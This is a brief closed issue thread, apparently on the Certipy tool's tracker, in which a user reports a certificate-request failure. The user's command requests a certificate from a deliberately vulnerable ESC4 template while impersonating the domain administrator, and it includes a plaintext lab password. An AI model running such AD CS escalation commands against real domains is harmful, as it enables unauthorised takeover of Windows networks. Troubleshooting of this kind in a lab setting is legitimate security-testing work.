Closed Ppsoft1991 closed 1 year ago
.\certipy.py req -username basic@padron.com -password 1qaz@WSX -template "漏洞模板ESC4" -ca padron-DC2-CA-1 -target-ip 192.168.0.201 -upn administrator@padron.com
got a error: code: 0x80094800 - CERTSRV_E_UNSUPPORTED_CERT_TYPE - The requested certificate template is not supported by this CA
I think this is related to the presence of Chinese in the template
The reason is Certificate Authorities null
.\certipy.py req -username basic@padron.com -password 1qaz@WSX -template "漏洞模板ESC4" -ca padron-DC2-CA-1 -target-ip 192.168.0.201 -upn administrator@padron.com
got a error: code: 0x80094800 - CERTSRV_E_UNSUPPORTED_CERT_TYPE - The requested certificate template is not supported by this CA
I think this is related to the presence of Chinese in the template